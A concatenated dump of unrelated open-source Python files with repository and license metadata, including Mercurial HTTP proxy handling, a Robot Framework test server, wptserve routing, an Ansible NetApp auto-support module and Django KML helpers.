tunnel_host = getattr(req, '_tunnel_host', None)
if tunnel_host:
if tunnel_host[:7] not in ['http://', 'https:/']:
tunnel_host = 'https://' + tunnel_host
new_tunnel = True
else:
tunnel_host = req.get_selector()
new_tunnel = False
if new_tunnel or tunnel_host == req.get_full_url(): # has proxy
u = util.url(tunnel_host)
if new_tunnel or u.scheme == 'https': # only use CONNECT for HTTPS
h.realhostport = ':'.join([u.host, (u.port or '443')])
h.headers = req.headers.copy()
h.headers.update(handler.parent.addheaders)
return
h.realhostport = None
h.headers = None
def _generic_proxytunnel(self):
proxyheaders = dict(
[(x, self.headers[x]) for x in self.headers
if x.lower().startswith('proxy-')])
self._set_hostport(self.host, self.port)
self.send('CONNECT %s HTTP/1.0\r\n' % self.realhostport)
for header in proxyheaders.iteritems():
self.send('%s: %s\r\n' % header)
self.send('\r\n')
# majority of the following code is duplicated from
# httplib.HTTPConnection as there are no adequate places to
# override functions to provide the needed functionality
res = self.response_class(self.sock,
strict=self.strict,
method=self._method)
while True:
version, status, reason = res._read_status()
if status != httplib.CONTINUE:
break
while True:
skip = res.fp.readline().strip()
if not skip:
break
res.status = status
res.reason = reason.strip()
if res.status == 200:
while True:
line = res.fp.readline()
if line == '\r\n':
break
return True
if version == 'HTTP/1.0':
res.version = 10
elif version.startswith('HTTP/1.'):
res.version = 11
elif version == 'HTTP/0.9':
res.version = 9
else:
raise httplib.UnknownProtocol(version)
if res.version == 9:
res.length = None
res.chunked = 0
res.will_close = 1
res.msg = httplib.HTTPMessage(cStringIO.StringIO())
return False
res.msg = httplib.HTTPMessage(res.fp)
res.msg.fp = None
# are we using the chunked-style of transfer encoding?
trenc = res.msg.getheader('transfer-encoding')
if trenc and trenc.lower() == "chunked":
res.chunked = 1
res.chunk_left = None
else:
res.chunked = 0
# will the connection close at the end of the response?
res.will_close = res._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, section 4.4, #3 says we ignore this if
# transfer-encoding is "chunked"
length = res.msg.getheader('content-length')
if length and not res.chunked:
try:
res.length = int(length)
except ValueError:
res.length = None
else:
if res.length < 0: # ignore nonsensical negative lengths
res.length = None
else:
res.length = None
# does the body have a fixed length? (of zero)
if (status == httplib.NO_CONTENT or status == httplib.NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
res._method == 'HEAD'):
res.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if (not res.will_close and
not res.chunked and
res.length is None):
res.will_close = 1
self.proxyres = res
return False
class httphandler(keepalive.HTTPHandler):
def http_open(self, req):
return self.do_open(httpconnection, req)
def _start_transaction(self, h, req):
_generic_start_transaction(self, h, req)
return keepalive.HTTPHandler._start_transaction(self, h, req)
if has_https:
class httpsconnection(httplib.HTTPSConnection):
response_class = keepalive.HTTPResponse
# must be able to send big bundle as stream.
send = _gen_sendfile(keepalive.safesend)
getresponse = keepalive.wrapgetresponse(httplib.HTTPSConnection)
def connect(self):
self.sock = _create_connection((self.host, self.port))
host = self.host
if self.realhostport: # use CONNECT proxy
_generic_proxytunnel(self)
host = self.realhostport.rsplit(':', 1)[0]
self.sock = sslutil.ssl_wrap_socket(
self.sock, self.key_file, self.cert_file,
**sslutil.sslkwargs(self.ui, host))
sslutil.validator(self.ui, host)(self.sock)
class httpshandler(keepalive.KeepAliveHandler, urllib2.HTTPSHandler):
def __init__(self, ui):
keepalive.KeepAliveHandler.__init__(self)
urllib2.HTTPSHandler.__init__(self)
self.ui = ui
self.pwmgr = passwordmgr(self.ui)
def _start_transaction(self, h, req):
_generic_start_transaction(self, h, req)
return keepalive.KeepAliveHandler._start_transaction(self, h, req)
def https_open(self, req):
# req.get_full_url() does not contain credentials and we may
# need them to match the certificates.
url = req.get_full_url()
user, password = self.pwmgr.find_stored_password(url)
res = httpconnectionmod.readauthforuri(self.ui, url, user)
if res:
group, auth = res
self.auth = auth
self.ui.debug("using auth.%s.* for authentication\n" % group)
else:
self.auth = None
return self.do_open(self._makeconnection, req)
def _makeconnection(self, host, port=None, *args, **kwargs):
keyfile = None
certfile = None
if len(args) >= 1: # key_file
keyfile = args[0]
if len(args) >= 2: # cert_file
certfile = args[1]
args = args[2:]
# if the user has specified different key/cert files in
# hgrc, we prefer these
if self.auth and 'key' in self.auth and 'cert' in self.auth:
keyfile = self.auth['key']
certfile = self.auth['cert']
conn = httpsconnection(host, port, keyfile, certfile, *args,
**kwargs)
conn.ui = self.ui
return conn
class httpdigestauthhandler(urllib2.HTTPDigestAuthHandler):
def __init__(self, *args, **kwargs):
urllib2.HTTPDigestAuthHandler.__init__(self, *args, **kwargs)
self.retried_req = None
def reset_retry_count(self):
# Python 2.6.5 will call this on 401 or 407 errors and thus loop
# forever. We disable reset_retry_count completely and reset in
# http_error_auth_reqed instead.
pass
def http_error_auth_reqed(self, auth_header, host, req, headers):
# Reset the retry counter once for each request.
if req is not self.retried_req:
self.retried_req = req
self.retried = 0
# In python < 2.5 AbstractDigestAuthHandler raises a ValueError if
# it doesn't know about the auth type requested. This can happen if
# somebody is using BasicAuth and types a bad password.
try:
return urllib2.HTTPDigestAuthHandler.http_error_auth_reqed(
self, auth_header, host, req, headers)
except ValueError, inst:
arg = inst.args[0]
if arg.startswith("AbstractDigestAuthHandler doesn't know "):
return
raise
class httpbasicauthhandler(urllib2.HTTPBasicAuthHandler):
def __init__(self, *args, **kwargs):
urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs)
self.retried_req = None
def reset_retry_count(self):
# Python 2.6.5 will call this on 401 or 407 errors and thus loop
# forever. We disable reset_retry_count completely and reset in
# http_error_auth_reqed instead.
pass
def http_error_auth_reqed(self, auth_header, host, req, headers):
# Reset the retry counter once for each request.
if req is not self.retried_req:
self.retried_req = req
self.retried = 0
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
self, auth_header, host, req, headers)
handlerfuncs = []
def opener(ui, authinfo=None):
'''
construct an opener suitable for urllib2
authinfo will be added to the password manager
'''
if ui.configbool('ui', 'usehttp2', False):
handlers = [httpconnectionmod.http2handler(ui, passwordmgr(ui))]
else:
handlers = [httphandler()]
if has_https:
handlers.append(httpshandler(ui))
handlers.append(proxyhandler(ui))
passmgr = passwordmgr(ui)
if authinfo is not None:
passmgr.add_password(*authinfo)
user, passwd = authinfo[2:4]
ui.debug('http auth: user %s, password %s\n' %
(user, passwd and '*' * len(passwd) or 'not set'))
handlers.extend((httpbasicauthhandler(passmgr),
httpdigestauthhandler(passmgr)))
handlers.extend([h(ui, passmgr) for h in handlerfuncs])
opener = urllib2.build_opener(*handlers)
# 1.0 here is the _protocol_ version
opener.addheaders = [('User-agent', 'mercurial/proto-1.0')]
opener.addheaders.append(('Accept', 'application/mercurial-0.1'))
return opener
def open(ui, url_, data=None):
u = util.url(url_)
if u.scheme:
u.scheme = u.scheme.lower()
url_, authinfo = u.authinfo()
else:
path = util.normpath(os.path.abspath(url_))
url_ = 'file://' + urllib.pathname2url(path)
authinfo = None
return opener(ui, authinfo).open(url_, data)
|
apache-2.0
|
xiaokeng/robotframework
|
atest/testdata/standard_libraries/remote/remoteserver.py
|
22
|
2143
|
import inspect
import sys
from SimpleXMLRPCServer import SimpleXMLRPCServer
class RemoteServer(SimpleXMLRPCServer):
def __init__(self, library, port=8270, port_file=None):
SimpleXMLRPCServer.__init__(self, ('127.0.0.1', int(port)))
self.library = library
self._shutdown = False
self.register_function(self.get_keyword_names)
self.register_function(self.get_keyword_arguments)
self.register_function(self.run_keyword)
announce_port(self.socket, port_file)
self.serve_forever()
def serve_forever(self):
while not self._shutdown:
self.handle_request()
def get_keyword_names(self):
return [attr for attr in dir(self.library) if attr[0] != '_']
def get_keyword_arguments(self, name):
kw = getattr(self.library, name)
args, varargs, kwargs, defaults = inspect.getargspec(kw)
args = args[1:] # drop 'self'
if defaults:
args, names = args[:-len(defaults)], args[-len(defaults):]
args += ['%s=%s' % (n, d) for n, d in zip(names, defaults)]
if varargs:
args.append('*%s' % varargs)
if kwargs:
args.append('**%s' % kwargs)
return args
def run_keyword(self, name, args, kwargs=None):
try:
result = getattr(self.library, name)(*args, **(kwargs or {}))
except AssertionError as err:
return {'status': 'FAIL', 'error': str(err)}
else:
return {'status': 'PASS',
'return': result if result is not None else ''}
class DirectResultRemoteServer(RemoteServer):
def run_keyword(self, name, args, kwargs=None):
try:
return getattr(self.library, name)(*args, **(kwargs or {}))
except SystemExit:
self._shutdown = True
return {'status': 'PASS'}
def announce_port(socket, port_file=None):
port = socket.getsockname()[1]
sys.stdout.write('Remote server starting on port %s.\n' % port)
sys.stdout.flush()
if port_file:
with open(port_file, 'w') as f:
f.write(str(port))
|
apache-2.0
|
omegix/ML256-Door-Auth
|
lib/quick2wire/i2c_ctypes.py
|
3
|
1763
|
# Warning: not part of the published Quick2Wire API.
#
# Converted from i2c.h and i2c-dev.h
# I2C only, no SMB definitions
from ctypes import c_int, c_uint16, c_ushort, c_short, c_ubyte, c_char, POINTER, Structure
# /usr/include/linux/i2c-dev.h: 38
class i2c_msg(Structure):
"""<linux/i2c-dev.h> struct i2c_msg"""
_fields_ = [
('addr', c_uint16),
('flags', c_ushort),
('len', c_short),
('buf', POINTER(c_char))]
__slots__ = [name for name,type in _fields_]
# i2c_msg flags
I2C_M_TEN = 0x0010 # this is a ten bit chip address
I2C_M_RD = 0x0001 # read data, from slave to master
I2C_M_NOSTART = 0x4000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_REV_DIR_ADDR = 0x2000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_IGNORE_NAK = 0x1000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_NO_RD_ACK = 0x0800 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_RECV_LEN = 0x0400 # length will be first received byte
# /usr/include/linux/i2c-dev.h: 155
class i2c_rdwr_ioctl_data(Structure):
"""<linux/i2c-dev.h> struct i2c_rdwr_ioctl_data"""
_fields_ = [
('msgs', POINTER(i2c_msg)),
('nmsgs', c_int)]
__slots__ = [name for name,type in _fields_]
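# Adapter functionality bits, as returned by the I2C_FUNCS ioctl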
I2C_FUNC_I2C = 0x00000001
I2C_FUNC_10BIT_ADDR = 0x00000002
I2C_FUNC_PROTOCOL_MANGLING = 0x00000004 # I2C_M_NOSTART etc.
# ioctls
I2C_SLAVE = 0x0703 # Change slave address
# Attn.: Slave address is 7 or 10 bits
I2C_SLAVE_FORCE = 0x0706 # Change slave address
# Attn.: Slave address is 7 or 10 bits
# This changes the address, even if it
# is already taken!
I2C_TENBIT = 0x0704 # 0 for 7 bit addrs, != 0 for 10 bit
I2C_FUNCS = 0x0705 # Get the adapter functionality
I2C_RDWR = 0x0707 # Combined R/W transfer (one stop only)
|
gpl-2.0
|
int19h/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Tools/scripts/byext.py
|
15
|
3904
|
#! /usr/bin/env python3
"""Show file statistics by extension."""
import os
import sys
class Stats:
def __init__(self):
self.stats = {}
def statargs(self, args):
for arg in args:
if os.path.isdir(arg):
self.statdir(arg)
elif os.path.isfile(arg):
self.statfile(arg)
else:
sys.stderr.write("Can't find %s\n" % arg)
self.addstats("<???>", "unknown", 1)
def statdir(self, dir):
self.addstats("<dir>", "dirs", 1)
try:
names = os.listdir(dir)
except OSError as err:
sys.stderr.write("Can't list %s: %s\n" % (dir, err))
self.addstats("<dir>", "unlistable", 1)
return
for name in sorted(names):
if name.startswith(".#"):
continue # Skip CVS temp files
if name.endswith("~"):
continue # Skip Emacs backup files
full = os.path.join(dir, name)
if os.path.islink(full):
self.addstats("<lnk>", "links", 1)
elif os.path.isdir(full):
self.statdir(full)
else:
self.statfile(full)
def statfile(self, filename):
head, ext = os.path.splitext(filename)
head, base = os.path.split(filename)
if ext == base:
ext = "" # E.g. .cvsignore is deemed not to have an extension
ext = os.path.normcase(ext)
if not ext:
ext = "<none>"
self.addstats(ext, "files", 1)
try:
with open(filename, "rb") as f:
data = f.read()
except IOError as err:
sys.stderr.write("Can't open %s: %s\n" % (filename, err))
self.addstats(ext, "unopenable", 1)
return
self.addstats(ext, "bytes", len(data))
if b'\0' in data:
self.addstats(ext, "binary", 1)
return
if not data:
self.addstats(ext, "empty", 1)
# self.addstats(ext, "chars", len(data))
lines = str(data, "latin-1").splitlines()
self.addstats(ext, "lines", len(lines))
del lines
words = data.split()
self.addstats(ext, "words", len(words))
def addstats(self, ext, key, n):
d = self.stats.setdefault(ext, {})
d[key] = d.get(key, 0) + n
def report(self):
exts = sorted(self.stats)
# Get the column keys
columns = {}
for ext in exts:
columns.update(self.stats[ext])
cols = sorted(columns)
colwidth = {}
colwidth["ext"] = max(map(len, exts))
minwidth = 6
self.stats["TOTAL"] = {}
for col in cols:
total = 0
cw = max(minwidth, len(col))
for ext in exts:
value = self.stats[ext].get(col)
if value is None:
w = 0
else:
w = len("%d" % value)
total += value
cw = max(cw, w)
cw = max(cw, len(str(total)))
colwidth[col] = cw
self.stats["TOTAL"][col] = total
exts.append("TOTAL")
for ext in exts:
self.stats[ext]["ext"] = ext
cols.insert(0, "ext")
def printheader():
for col in cols:
print("%*s" % (colwidth[col], col), end=' ')
print()
printheader()
for ext in exts:
for col in cols:
value = self.stats[ext].get(col, "")
print("%*s" % (colwidth[col], value), end=' ')
print()
printheader() # Another header at the bottom
def main():
args = sys.argv[1:]
if not args:
args = [os.curdir]
s = Stats()
s.statargs(args)
s.report()
if __name__ == "__main__":
main()
|
apache-2.0
|
timopulkkinen/BubbleFish
|
tools/json_schema_compiler/json_schema_test.py
|
8
|
1595
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json_schema
import json_schema_test
import unittest
class JsonSchemaUnittest(unittest.TestCase):
def testNocompile(self):
compiled = [
{
"namespace": "compile",
"functions": [],
"types": {}
},
{
"namespace": "functions",
"functions": [
{
"id": "two"
},
{
"id": "four"
}
],
"types": {
"one": { "key": "value" }
}
},
{
"namespace": "types",
"functions": [
{ "id": "one" }
],
"types": {
"two": {
"key": "value"
},
"four": {
"key": "value"
}
}
},
{
"namespace": "nested",
"properties": {
"sync": {
"functions": [
{
"id": "two"
},
{
"id": "four"
}
],
"types": {
"two": {
"key": "value"
},
"four": {
"key": "value"
}
}
}
}
}
]
schema = json_schema.CachedLoad('test/json_schema_test.json')
self.assertEquals(compiled, json_schema.DeleteNodes(schema, 'nocompile'))
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
ypwalter/fxos-certsuite
|
mcts/web-platform-tests/tests/tools/wptserve/wptserve/router.py
|
10
|
5745
|
import itertools
import logging
import re
import types
logger = logging.getLogger("wptserve")
logger.setLevel(logging.DEBUG)
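# Sentinel used when registering a route that should match any HTTP method.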
any_method = object()
class RouteTokenizer(object):
def literal(self, scanner, token):
return ("literal", token)
def slash(self, scanner, token):
return ("slash", None)
def group(self, scanner, token):
return ("group", token[1:-1])
def star(self, scanner, token):
return ("star", token[1:-3])
def scan(self, input_str):
scanner = re.Scanner([(r"/", self.slash),
(r"{\w*}", self.group),
(r"\*", self.star),
(r"(?:\\.|[^{\*/])*", self.literal),])
return scanner.scan(input_str)
class RouteCompiler(object):
def __init__(self):
self.reset()
def reset(self):
self.star_seen = False
def compile(self, tokens):
self.reset()
func_map = {"slash":self.process_slash,
"literal":self.process_literal,
"group":self.process_group,
"star":self.process_star}
re_parts = ["^"]
if not tokens or tokens[0][0] != "slash":
tokens = itertools.chain([("slash", None)], tokens)
for token in tokens:
re_parts.append(func_map[token[0]](token))
re_parts.append("$")
return re.compile("".join(re_parts))
def process_literal(self, token):
return re.escape(token[1])
def process_slash(self, token):
return "/"
def process_group(self, token):
if self.star_seen:
raise ValueError("Group seen after star in regexp")
return "(?P<%s>[^/]+)" % token[1]
def process_star(self, token):
if self.star_seen:
raise ValueError("Star seen after star in regexp")
self.star_seen = True
return "(.*)"
def compile_path_match(route_pattern):
"""tokens: / or literal or match or *"""
tokenizer = RouteTokenizer()
tokens, unmatched = tokenizer.scan(route_pattern)
assert unmatched is "", unmatched
compiler = RouteCompiler()
return compiler.compile(tokens)
class Router(object):
"""Object for matching handler functions to requests.
:param doc_root: Absolute path of the filesystem location from
which to serve tests
:param routes: Initial routes to add; a list of three item tuples
(method, path_pattern, handler_function), defined
as for register()
"""
def __init__(self, doc_root, routes):
self.doc_root = doc_root
self.routes = []
for route in reversed(routes):
self.register(*route)
def register(self, methods, path, handler):
"""Register a handler for a set of paths.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param path_pattern: Match pattern that will be used to determine if
a request path matches this route. Match patterns
                             consist of literal text, match groups, denoted
                             {name}, which match any character except /, and
                             at most one \*, which matches any character.
If there is no leading "/" on the pattern, this is
automatically implied. For example::
api/{resource}/*.json
Would match `/api/test/data.json` or
`/api/test/test2/data.json`, but not `/api/test/data.py`.
The match groups, and anything matching the * are made
available in the request object as a dictionary through
the route_match property. For example, given the route
pattern above and the path `/api/test/data.json`, the
route_match property would contain::
{"resource": "test", "*": "data"}
:param handler: Function that will be called to process matching
requests. This must take two parameters, the request
object and the response object.
"""
if type(methods) in types.StringTypes or methods is any_method:
methods = [methods]
for method in methods:
self.routes.append((method, compile_path_match(path), handler))
print self.routes[-1][1].pattern
def get_handler(self, request):
"""Get a handler for a request or None if there is no handler.
:param request: Request to get a handler for.
:rtype: Callable or None
"""
for method, regexp, handler in reversed(self.routes):
if (request.method == method or
method is any_method or
(request.method == "HEAD" and method == "GET")):
m = regexp.match(request.url_parts.path)
if m:
if not hasattr(handler, "__class__"):
name = handler.__name__
else:
name = handler.__class__.__name__
logger.debug("Found handler %s" % name)
match_parts = m.groupdict().copy()
if len(match_parts) < len(m.groups()):
match_parts["*"] = m.groups()[-1]
request.route_match = match_parts
return handler
return None
|
mpl-2.0
|
maxalbert/bokeh
|
bokeh/compat/mplexporter/renderers/vincent_renderer.py
|
64
|
1922
|
import warnings
from .base import Renderer
from ..exporter import Exporter
class VincentRenderer(Renderer):
def open_figure(self, fig, props):
self.chart = None
self.figwidth = int(props['figwidth'] * props['dpi'])
self.figheight = int(props['figheight'] * props['dpi'])
def draw_line(self, data, coordinates, style, label, mplobj=None):
import vincent # only import if VincentRenderer is used
if coordinates != 'data':
warnings.warn("Only data coordinates supported. Skipping this")
linedata = {'x': data[:, 0],
'y': data[:, 1]}
line = vincent.Line(linedata, iter_idx='x',
width=self.figwidth, height=self.figheight)
# TODO: respect the other style settings
line.scales['color'].range = [style['color']]
if self.chart is None:
self.chart = line
else:
warnings.warn("Multiple plot elements not yet supported")
def draw_markers(self, data, coordinates, style, label, mplobj=None):
import vincent # only import if VincentRenderer is used
if coordinates != 'data':
warnings.warn("Only data coordinates supported. Skipping this")
markerdata = {'x': data[:, 0],
'y': data[:, 1]}
markers = vincent.Scatter(markerdata, iter_idx='x',
width=self.figwidth, height=self.figheight)
# TODO: respect the other style settings
markers.scales['color'].range = [style['facecolor']]
if self.chart is None:
self.chart = markers
else:
warnings.warn("Multiple plot elements not yet supported")
def fig_to_vincent(fig):
"""Convert a matplotlib figure to a vincent object"""
renderer = VincentRenderer()
exporter = Exporter(renderer)
exporter.run(fig)
return renderer.chart
|
bsd-3-clause
|
skg-net/ansible
|
lib/ansible/modules/storage/netapp/netapp_e_asup.py
|
4
|
11216
|
#!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: netapp_e_asup
short_description: manage E-Series auto-support settings
description:
- Allow the auto-support settings to be configured for an individual E-Series storage-system
version_added: '2.7'
author: Michael Price (@lmprice)
extends_documentation_fragment:
- netapp.eseries
options:
state:
description:
- Enable/disable the E-Series auto-support configuration.
- When this option is enabled, configuration, logs, and other support-related information will be relayed
        to NetApp to help better support your system. No personally identifiable information, passwords, etc., will
be collected.
default: enabled
choices:
- enabled
- disabled
aliases:
- asup
- auto_support
- autosupport
active:
description:
- Enable active/proactive monitoring for ASUP. When a problem is detected by our monitoring systems, it's
possible that the bundle did not contain all of the required information at the time of the event.
Enabling this option allows NetApp support personnel to manually request transmission or re-transmission
        of support data in order to resolve the problem.
- Only applicable if I(state=enabled).
default: yes
type: bool
start:
description:
- A start hour may be specified in a range from 0 to 23 hours.
- ASUP bundles will be sent daily between the provided start and end time (UTC).
- I(start) must be less than I(end).
aliases:
- start_time
default: 0
end:
description:
- An end hour may be specified in a range from 1 to 24 hours.
- ASUP bundles will be sent daily between the provided start and end time (UTC).
- I(start) must be less than I(end).
aliases:
- end_time
default: 24
days:
description:
- A list of days of the week that ASUP bundles will be sent. A larger, weekly bundle will be sent on one
of the provided days.
choices:
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
- sunday
required: no
aliases:
- days_of_week
- schedule_days
verbose:
description:
- Provide the full ASUP configuration in the return.
default: no
required: no
type: bool
log_path:
description:
- A local path to a file to be used for debug logging
required: no
notes:
- Check mode is supported.
- Enabling ASUP will allow our support teams to monitor the logs of the storage-system in order to proactively
respond to issues with the system. It is recommended that all ASUP-related options be enabled, but they may be
disabled if desired.
- This API is currently only supported with the Embedded Web Services API v2.0 and higher.
"""
EXAMPLES = """
- name: Enable ASUP and allow pro-active retrieval of bundles
netapp_e_asup:
state: enabled
active: yes
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
- name: Set the ASUP schedule to only send bundles from 12 AM CST to 3 AM CST.
netapp_e_asup:
start: 17
end: 20
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
"""
RETURN = """
msg:
description: Success message
returned: on success
type: string
sample: The settings have been updated.
asup:
description:
- True if ASUP is enabled.
returned: on success
sample: True
type: bool
active:
description:
- True if the active option has been enabled.
returned: on success
sample: True
type: bool
cfg:
description:
- Provide the full ASUP configuration.
returned: on success when I(verbose=true).
type: complex
contains:
asupEnabled:
description:
- True if ASUP has been enabled.
type: bool
onDemandEnabled:
description:
- True if ASUP active monitoring has been enabled.
type: bool
daysOfWeek:
description:
- The days of the week that ASUP bundles will be sent.
type: list
"""
import json
import logging
from pprint import pformat
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netapp import request, eseries_host_argument_spec
from ansible.module_utils._text import to_native
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
}
class Asup(object):
DAYS_OPTIONS = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']
def __init__(self):
argument_spec = eseries_host_argument_spec()
argument_spec.update(dict(
state=dict(type='str', required=False, default='enabled', aliases=['asup', 'auto_support', 'autosupport'],
choices=['enabled', 'disabled']),
active=dict(type='bool', required=False, default=True, ),
days=dict(type='list', required=False, aliases=['schedule_days', 'days_of_week'],
choices=self.DAYS_OPTIONS),
start=dict(type='int', required=False, default=0, aliases=['start_time']),
end=dict(type='int', required=False, default=24, aliases=['end_time']),
verbose=dict(type='bool', required=False, default=False),
log_path=dict(type='str', required=False),
))
self.module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, )
args = self.module.params
self.asup = args['state'] == 'enabled'
self.active = args['active']
self.days = args['days']
self.start = args['start']
self.end = args['end']
self.verbose = args['verbose']
self.ssid = args['ssid']
self.url = args['api_url']
self.creds = dict(url_password=args['api_password'],
validate_certs=args['validate_certs'],
url_username=args['api_username'], )
self.check_mode = self.module.check_mode
log_path = args['log_path']
# logging setup
self._logger = logging.getLogger(self.__class__.__name__)
if log_path:
logging.basicConfig(
level=logging.DEBUG, filename=log_path, filemode='w',
format='%(relativeCreated)dms %(levelname)s %(module)s.%(funcName)s:%(lineno)d\n %(message)s')
if not self.url.endswith('/'):
self.url += '/'
if self.start >= self.end:
self.module.fail_json(msg="The value provided for the start time is invalid."
" It must be less than the end time.")
if self.start < 0 or self.start > 23:
self.module.fail_json(msg="The value provided for the start time is invalid. It must be between 0 and 23.")
else:
self.start = self.start * 60
if self.end < 1 or self.end > 24:
self.module.fail_json(msg="The value provided for the end time is invalid. It must be between 1 and 24.")
else:
self.end = min(self.end * 60, 1439)
if not self.days:
self.days = self.DAYS_OPTIONS
def get_configuration(self):
try:
(rc, result) = request(self.url + 'device-asup', headers=HEADERS, **self.creds)
if not (result['asupCapable'] and result['onDemandCapable']):
self.module.fail_json(msg="ASUP is not supported on this device. Array Id [%s]." % (self.ssid))
return result
except Exception as err:
self.module.fail_json(msg="Failed to retrieve ASUP configuration! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
def update_configuration(self):
config = self.get_configuration()
update = False
body = dict()
if self.asup:
body = dict(asupEnabled=True)
if not config['asupEnabled']:
update = True
if (config['onDemandEnabled'] and config['remoteDiagsEnabled']) != self.active:
update = True
body.update(dict(onDemandEnabled=self.active,
remoteDiagsEnabled=self.active))
self.days.sort()
config['schedule']['daysOfWeek'].sort()
body['schedule'] = dict(daysOfWeek=self.days,
dailyMinTime=self.start,
dailyMaxTime=self.end,
weeklyMinTime=self.start,
weeklyMaxTime=self.end)
if self.days != config['schedule']['daysOfWeek']:
update = True
if self.start != config['schedule']['dailyMinTime'] or self.start != config['schedule']['weeklyMinTime']:
update = True
elif self.end != config['schedule']['dailyMaxTime'] or self.end != config['schedule']['weeklyMaxTime']:
update = True
elif config['asupEnabled']:
body = dict(asupEnabled=False)
update = True
self._logger.info(pformat(body))
if update and not self.check_mode:
try:
(rc, result) = request(self.url + 'device-asup', method='POST',
data=json.dumps(body), headers=HEADERS, **self.creds)
# This is going to catch cases like a connection failure
except Exception as err:
self.module.fail_json(msg="We failed to set the storage-system name! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
return update
def update(self):
update = self.update_configuration()
cfg = self.get_configuration()
if self.verbose:
self.module.exit_json(msg="The ASUP settings have been updated.", changed=update,
asup=cfg['asupEnabled'], active=cfg['onDemandEnabled'], cfg=cfg)
else:
self.module.exit_json(msg="The ASUP settings have been updated.", changed=update,
asup=cfg['asupEnabled'], active=cfg['onDemandEnabled'])
def __call__(self, *args, **kwargs):
self.update()
def main():
settings = Asup()
settings()
if __name__ == '__main__':
main()
|
gpl-3.0
|
clumsy/intellij-community
|
python/lib/Lib/site-packages/django/contrib/gis/shortcuts.py
|
317
|
1161
|
import cStringIO, zipfile
from django.conf import settings
from django.http import HttpResponse
from django.template import loader
def compress_kml(kml):
"Returns compressed KMZ from the given KML string."
kmz = cStringIO.StringIO()
zf = zipfile.ZipFile(kmz, 'a', zipfile.ZIP_DEFLATED)
zf.writestr('doc.kml', kml.encode(settings.DEFAULT_CHARSET))
zf.close()
kmz.seek(0)
return kmz.read()
def render_to_kml(*args, **kwargs):
"Renders the response as KML (using the correct MIME type)."
return HttpResponse(loader.render_to_string(*args, **kwargs),
mimetype='application/vnd.google-earth.kml+xml')
def render_to_kmz(*args, **kwargs):
"""
Compresses the KML content and returns as KMZ (using the correct
MIME type).
"""
return HttpResponse(compress_kml(loader.render_to_string(*args, **kwargs)),
mimetype='application/vnd.google-earth.kmz')
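# A hypothetical usage sketch from a Django view (the template path and the
# Place model below are illustrative, not part of this module):
#
#   def placemarks_kmz(request):
#       return render_to_kmz('gis/kml/placemarks.kml',
#                            {'places': Place.objects.kml()})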
def render_to_text(*args, **kwargs):
"Renders the response using the MIME type for plain text."
return HttpResponse(loader.render_to_string(*args, **kwargs),
mimetype='text/plain')
|
apache-2.0
|
xq262144/hue
|
desktop/core/ext-py/pycrypto-2.6.1/lib/Crypto/SelfTest/Protocol/__init__.py
|
116
|
1751
|
# -*- coding: utf-8 -*-
#
# SelfTest/Protocol/__init__.py: Self-tests for Crypto.Protocol
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test for Crypto.Protocol"""
__revision__ = "$Id$"
def get_tests(config={}):
tests = []
from Crypto.SelfTest.Protocol import test_chaffing; tests += test_chaffing.get_tests(config=config)
from Crypto.SelfTest.Protocol import test_rfc1751; tests += test_rfc1751.get_tests(config=config)
from Crypto.SelfTest.Protocol import test_AllOrNothing; tests += test_AllOrNothing.get_tests(config=config)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
|
apache-2.0
|
zdary/intellij-community
|
plugins/hg4idea/testData/bin/mercurial/extensions.py
|
91
|
10949
|
# extensions.py - extension handling for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import imp, os
import util, cmdutil, error
from i18n import _, gettext
_extensions = {}
_order = []
